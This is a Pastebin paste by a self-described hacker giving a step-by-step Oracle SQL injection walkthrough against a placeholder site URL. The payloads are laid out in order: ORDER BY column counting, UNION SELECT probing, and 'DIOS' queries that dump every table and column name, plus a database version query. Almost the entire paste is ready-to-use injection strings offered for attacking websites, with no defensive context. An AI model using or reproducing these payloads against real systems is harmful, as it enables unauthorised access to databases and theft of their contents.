Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <===============Hacker zurael sTz===============>
- =================twitter=============================
- https://twitter.com/zurael_stz
- =================facebook============================
- https://www.facebook.com/sTzisrael/
- =====================================================
- =================telegram============================
- https://telegram.me/joinchat/BL8GnT_yQscC-6gBMuCW_w
- =====================================================
- <===============Hacker zurael sTz===============>
- Oracle SQL Injection and DIOS query
- http://www.site.it/pages.php?p=cut-linear') order by 3--&lang=it
- No Error
- http://www.site.it/pages.php?p=cut-linear') order by 4--&lang=it
- No Error
- http://www.site.it/pages.php?p=cut-linear') order by 5--&lang=it
- Error
- http://www.site.it/pages.php?p=cut-linear') Union All Select NULL,NULL,NULL,NULL from dual--&lang=it
- ctrl+u (view-source:)
- view-source:http://www.site.it/pages.php?p=cut-linear') Union All Select '1111',NULL,NULL,NULL from dual--&lang=it
- view-source:http://www.site.it/pages.php?p=cut-linear') Union All Select NULL,'1111',NULL,NULL from dual--&lang=it
- view-source:}
- <meta name="description" content="11111" />
- <meta name="description" content="1" />
- }
- '">'||(select LISTAGG(table_name,'<li>') within group (ORDER BY table_name) from all_tables)||'<!--'
- (select wm_concat('<li>'||table_name||':'||column_name)from (select rownum as rnum,table_name,column_name from all_tab_columns order by table_name desc) shell where rnum<120)||'<!--'
- http://www.site.it/pages.php?p=cut-linear') and 1=0 union select null,'">'||(select LISTAGG(table_name,'<li>') within group (ORDER BY table_name) from all_tables)||'<!--' ,NULL,NULL from dual --&lang=it
- (select banner from v$version where rownum=1)
Add Comment
Please, Sign In to add comment